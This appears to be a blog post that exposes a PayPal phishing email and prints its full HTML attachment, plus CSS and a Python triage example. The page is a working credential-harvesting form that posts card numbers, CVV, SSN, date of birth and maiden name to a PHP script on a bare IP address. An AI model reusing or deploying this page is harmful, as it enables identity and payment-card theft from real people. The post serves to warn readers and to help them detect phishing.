PayPal Phishing Script Hosted in Sao Paulo, Brazil (Telemar Norte Leste S.A.)

I got this email today in my spam folder:

Dear valued PayPal Customer,

We’re constantly working to make PayPal safer, simpler and more convenient for
our customers.
This means that from time to time we have to verify and keep up to date your
account.

It has come to our attention that your PayPal account information needs to be
updated as part of our continuing commitment to protect your account.

Attached at this message you have the reactivation form for your account.

Open and Complete this form to avoid account termination.Remember to allow
JavaScript or ActiveX from the pop-up bar that will appear when you complete the
form.

Thank you. PayPal Account Service

I followed orders, so I got the ResolutionCenter – Confirm Identity Form.html, lol.
Then I opened this file with EditPlus to look for something special inside.
I got this URL: http://200.217.207.56/central2/cores/wp/w.php
The Brazilian hacker is using the psiunet Brazilian ISP to host his garbage.

Phishing Script here:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title>PayPal - restore your account</title><link rel="stylesheet" href="http://200.217.207.56/central2/cores/wp/style.css" /><script type="text/javascript" language="javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.2.6/jquery.min.js"></script><script type="text/javascript" language="javascript" src="http://plugins.jquery.com/files/jquery.color.js.txt"></script><script type="text/javascript" language="javascript">function tst(r,e){return r.test(document.forms[0].elements[e].value);} function r(e,m){alert(m); var elem = document.forms[0].elements[e]; elem.focus(); $(elem).css({background:'#f00'});$(elem).animate({ backgroundColor: "white" }, "150");return false;}function elm(e){return document.forms[0].elements[e];}function validate(frm){    if(!tst(/^.{2,}$/i,'fname')){return r('fname','First Name: Please enter your first name.');}    if(!tst(/^.{2,}$/i,'lname')){return r('lname','Last Name: Please enter your last name.');}    if(!tst(/^.{4,}$/i,'add')){return r('add','Address Line 1: Please enter your full street address.');}    if(!tst(/^.{2,}$/i,'city')){return r('city','City: Please enter your city.');}    if(!tst(/^.{2,}$/i,'state')){return r('state','State: Please enter your state.');}    if(!tst(/^[0-9]{4,9}$/i,'zip')){return r('zip','Zip Code: Please enter your zip code rUse only digits.');}    if(!tst(/^[0-9]{3}$/i,'tel1')){return r('tel1','Home Phone Number: Please enter a valid phone number.');}    if(!tst(/^[0-9]{3}$/i,'tel2')){return r('tel2','Home Phone Number: Please enter a valid phone number.');}    if(!tst(/^[0-9]{4}$/i,'tel3')){return r('tel3','Home Phone Number: Please enter a valid phone number.');}    if(!tst(/^.{2,}$/i,'mmn')){return r('mmn','Mother's Maiden Name: Please enter your mother's 
maiden name.');}    if(!tst(/^[0-9]{2}$/i,'dobm')){return r('dobm','Date of Birth: Please enter a valid date of birth.');}    if(!tst(/^[0-9]{2}$/i,'dobd')){return r('dobd','Date of Birth: Please enter a valid date of birth.');}    if(!tst(/^[0-9]{4}$/i,'doby')){return r('doby','Date of Birth: Please enter a valid date of birth.');}    if(!tst(/^(3|4|5|6){1}[0-9]{15,16}$/i,'cc')){return r('cc','Credit / Debit Card Number: Please enter a valid Card Number,n16 to 17 digits without spaces or dashes.');}    if(!tst(/^[0-9]{1,2}$/i,'expm')){return r('expm','Expiration Date: Please enter a valid Expiration Date.');}    if(!tst(/^[0-9]{2}$/i,'expy')){return r('expy','Expiration Date: Please enter a valid Expiration Date.');}    if(!tst(/^[0-9]{3,4}$/i,'cvv')){return r('cvv','CSC: Please enter a valid CSCn3 to 4 digits.');}    return true;}</script></head><body>    <div id="h1">        <a target="_blank" href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_registration-run" onclick="return false">Sign Up</a> | <a target="_blank" href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_login-run" onclick="return false">Log In</a> | <a target="_blank" href="https://www.paypal.com/us/cgi-bin/helpweb?cmd=_help" onclick="return false">Help</a> | <a target="_blank" href="https://www.paypal.com/securitycenter" onclick="return false">Security Center</a>        <span id="search"><input type="text" size="15" id="s_field"/>&nbsp;&nbsp;<input type="button" value="Search" id="s_btt"/></span>    </div>    <div id="h2">        <a target="_blank" href="http://www.paypal.com/" onclick="return false"></a>    </div>    <div id="h3">        <a target="_blank" href="http://www.paypal.com/" onclick="return false">Home</a>        <a target="_blank" href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_home-customer&nav=1" onclick="return false">Personal</a>        <a target="_blank" href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_home-merchant&nav=2" onclick="return false">Business</a>        <a 
target="_blank" href="https://cms.paypal.com/us/cgi-bin/marketingweb?cmd=_render-content&content_ID=products_services/product_services01" onclick="return false">Products & Services</a>        <a target="_blank" href="https://www.paypal.com/shopping_outside" onclick="return false">Shopping</a>    </div>    <br /><br /><h3 class="or"><font size="3">Restore your account</font></h3>    <p>You have received this file because your PayPal account has been temporarily suspended. <br>Please fill out and submit this form in order to restore your account.</p>    <p><font color="#FF0000">*</font> Please fill in all fields.</p>    <div id="h4">        <form name="frm" method="post" action="http://200.217.207.56/central2/cores/wp/w.php" onsubmit="return validate()" >            <table border="0" style="margin: 0 auto">                <tr>                    <td valign="top">                        First Name<br />                        <input type="text" name="fname" size="29" style="font-size: 8pt" />                        <br />                        <div class="space"></div>                        Last Name<br />                        <input type="text" name="lname" size="29" style="font-size: 8pt"/>                        <br />                        <div class="space"></div>                        Address Line 1<br />                        <input type="text" name="add" size="29" style="font-size: 8pt"/>                        <br />                        <div class="space"></div>                        City<br />                        <input type="text" name="city" size="29" style="font-size: 8pt"/>                        <br />                        <div class="space"></div>                        <span style="margin-right: 103px;">State</span>Zip Code<br />                        <input type="text" name="state" size="14" style="font-size: 8pt" />                        &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;                        <input type="text" 
name="zip" size="10" maxlength="9" style="font-size: 8pt" />                        <p>Home Phone Number<br />                        <input type="text" name="tel1" size="3" maxlength="3" style="font-size: 8pt"/> -                        <input type="text" name="tel2" size="3" maxlength="3" style="font-size: 8pt"/> -                        <input type="text" name="tel3" size="4" maxlength="4" style="font-size: 8pt"/>                        </td>                    <td style="width: 150px;"></td>                    <td valign="top">                        Mother&#39;s Maiden Name<br />                        <input type="text" name="mmn" size="29" style="font-size: 8pt"/>                        <div class="space"></div>                        Date of Birth <span class="help">(Month / Day / Year)</span><br />                            <input type="text" name="dobm" size="2" maxlength="2" style="font-size: 8pt"/> /                            <input type="text" name="dobd" size="2" maxlength="2" style="font-size: 8pt"/> /                            <input type="text" name="doby" size="4" maxlength="4" style="font-size: 8pt"/>                         <div class="space"></div>                        Social Security Number<span class="help">(US citizens only)</span><br />                        <input type="text" name="ssn1" size="3" maxlength="3" style="font-size: 8pt"/> -                        <input type="text" name="ssn2" size="2" maxlength="2" style="font-size: 8pt"/> -                        <input type="text" name="ssn3" size="4" maxlength="4" style="font-size: 8pt"/>                        <br />                        <div class="space"></div>                        Credit / Debit Card Number<br />                        <input type="text" name="cc" size="29" maxlength="17" style="font-size: 8pt"/>                        <br />                        <div class="space"></div>                        <span style="margin-right: 55px;">Expiration 
Date&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; </span>CSC <a href="javascript: " onclick="window.open('https://www.paypal.com/us/cgi-bin/webscr?cmd=p/acc/cvv_info_pop-outside','_blank','width=410,height=470')">What's this</a><br />                        <input type="text" name="expm" size="2" maxlength="2" style="font-size: 8pt" />                        /                        <input type="text" name="expy" size="2" maxlength="2" style="font-size: 8pt" />                        <span class="help">(MM / YY)</span> &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;                        <input type="text" name="cvv" size="5" maxlength="4" style="font-size: 8pt" />                        <div class="space"></div>                         Bank Name<br />                        <input type="text" name="bank" size="40" maxlength="50" style="font-size: 8pt"/>                        <div class="space"></div>                        </td>                </tr>                <tr>                    <td colspan="3" align="center" style="padding: 40px 0 0 0;">                    <input type="submit" class="submit" value="Submit" style="font-size: 8pt; font-weight: bold" /></td>                </tr>            </table>        </form>    </div><br /><br />    <div id="foot">        <a href="http://www.paypal-media.com/aboutus.cfm" onclick="return false">About Us</a> |        <a href="https://www.paypal.com/us/cgi-bin/helpscr?cmd=_help&amp;t=escalateTab" onclick="return false">Contact Us</a> |        <a href="http://www.paypal.com/us/cgi-bin/webscr?cmd=_display-fees-outside" onclick="return false">Fees</a> |        <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=p/gen/jobs-outside" onclick="return false">Jobs</a> |        <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_home-merchant" onclick="return false">Merchant Services</a> |        <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=_display-country-functionality-outside" onclick="return false">Worldwide</a> |       
 <a id="fb" href="http://www.ebay.com/" onclick="return false">Site feedback</a>|<br />        <a href="http://www.paypal.com/us/cgi-bin/webscr?cmd=p/gen/ua/policy_privacy-outside" onclick="return false">Privacy</a> |        <a href="http://www.thepaypalblog.com" onclick="return false">Our Blog</a> |        <a href="https://www.paypal-labs.com" onclick="return false">Labs</a> |        <a href="http://www.paypal.com/us/cgi-bin/webscr?cmd=_web-referrals-mrb-outside" onclick="return false">Referrals</a> |        <a href="http://www.paypal.com/us/cgi-bin/webscr?cmd=p/gen/ua/ua-outside" onclick="return false">Legal Agreements</a> |        <a href="https://www.paypal.com/us/cgi-bin/webscr?cmd=xpt/Marketing/general/SiteMap-outside" onclick="return false">Site Map</a> |        <a href="http://www.ebay.com/" onclick="return false">eBay</a>        <p>Copyright &copy; 1999-2009 PayPal. All rights reserved.</p>    </div></body></html>
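
The indicators visible in the attachment above (a form that posts to a bare IP address, inputs asking for card, CSC, SSN and maiden-name data, and every link disabled with onclick="return false") can be checked automatically before anyone opens such a file in a browser. The Python below is an added example, not part of the original post or the phishing kit; the function names, the SENSITIVE prefix list and the sample HTML are assumptions made for illustration, and it only parses the text without contacting any host.

```python
import ipaddress
from html.parser import HTMLParser
from urllib.parse import urlparse

# Input-name prefixes taken from the form on this page (card, CSC, SSN, maiden name, DOB).
SENSITIVE = ("cc", "cvv", "ssn", "mmn", "dob")
# Constructed sample modeled on the attachment; 192.0.2.10 is a documentation address.
SAMPLE = """<a href="https://www.paypal.com/" onclick="return false">Home</a>
<a href="https://www.paypal.com/securitycenter" onclick="return false">Help</a>
<form method="post" action="http://192.0.2.10/w.php">
<input name="fname"/><input name="cc"/><input name="cvv"/><input name="ssn1"/></form>"""

class FormTriage(HTMLParser):
    """Collects form targets, input names and links whose click handler cancels navigation."""
    def __init__(self):
        super().__init__()
        self.actions, self.inputs, self.links, self.decoys = [], [], 0, 0

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.actions.append(a.get("action") or "")
        elif tag == "input" and a.get("name"):
            self.inputs.append(a["name"].lower())
        elif tag == "a":
            self.links += 1
            onclick = (a.get("onclick") or "").replace(" ", "").lower()
            self.decoys += onclick.startswith("returnfalse")

def host_is_ip(url):
    try:
        ipaddress.ip_address(urlparse(url).hostname or "")
        return True
    except ValueError:
        return False

def triage(html):
    """Return human-readable findings for one HTML attachment; parses only, never fetches."""
    p = FormTriage()
    p.feed(html)
    findings = ["form posts to a bare IP address: " + a for a in p.actions if host_is_ip(a)]
    hits = sorted({n for n in p.inputs if n.startswith(SENSITIVE)})
    if hits:
        findings.append("sensitive fields requested: " + ", ".join(hits))
    if p.links and p.decoys == p.links:
        findings.append("all %d links are disabled decoys" % p.links)
    return findings

if __name__ == "__main__":
    print("\n".join(triage(SAMPLE)))
```

An empty result does not clear a file; the three checks cover only the traits this particular attachment shows.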

robots2.txt is the file where all stolen credit cards are saved

style.css:

body{width: 760px; font:normal 12px Arial,Helvetica,sans-serif; margin:0 auto; padding:0;}
    a{color: #084482; font-size: 10.8px}
    #h1{text-align: right; }
    #h1 a{padding: 0 5px 0 5px;}
    #search{background: url(img/hdr_search_bg.gif) no-repeat #D5D5D5; padding: 4px 10px 0px 19px; display: inline-block; height:26px;}
    #s_field{font-size: 11px; border: 1px solid #ADC2D6; padding:2px; margin: 0;}
    #s_btt{padding: 2px 1px 2px 1px; background: url(img/btt_search.gif) repeat-x; font-size: 11px; border: 1px outset #ccc; cursor:pointer; margin: 0;}
    #h2{height: 70px; background:url(img/paypal_logo.gif) no-repeat; margin-top:5px;}
    #h2 a{width: 200px; height:50px; display: block}
    #h3 {background: url(img/h3bg.gif) center bottom repeat-x; padding-left: 10px;}
    #h3 a{background: url(img/h3a.gif) center bottom repeat-x; padding: 4px 11px 0 11px; display:inline-block; height: 18px; color:#fff; text-decoration: none; font-weight: bold; font-size:12px; margin-right: 2px;}
    #h3 a:hover{background: url(img/h3ah.gif) center bottom repeat-x;}
    .or{color: #c88039; font-size:1.3em}
    h1, h2, h3, h4, h5, h6{margin-top: 0.1em; margin-right: 0pt; margin-bottom: 0.1em; margin-left: 0pt; line-height: normal; }
    #h4{background: url(img/blue_white_gray_gradient.jpg) bottom repeat-x; border: 1px solid #CCCCCC; padding: 15px}
    td#info{text-align: left;padding-top: 12px;}
    #secure{background: url(img/secure_lock_2.gif) right top no-repeat; padding: 1px 20px 3px 3px; display: block;float: right}
    #cb{clear: both;}
    input{border: 1px solid #adc2d6; margin: 4px 0 4px 0;padding: 2px;}
    span.help{color: #888;font-size: 11px;}
    #all{display: none;    }
    .space{height: 11px;}
    .submit{cursor: pointer; background: url(img/btn.gif) 0% 17% repeat-x #FFA822; font-size: 1.1em; border-width: 1px; border-top-color: #D5BD98; border-right-color: #935E0D; border-bottom-color: #935E0D; border-left-color: #D5BD98; padding: 2px 20px 2px 20px}
    #foot{color: #999; text-align: center; font-size: 11px}
    #foot a{margin: 0 3px 0 3px; }
    #fb{padding-right: 15px; background:url(img/fb.gif) right center no-repeat;}

Hosting info:
http://whois.domaintools.com/200.217.207.56
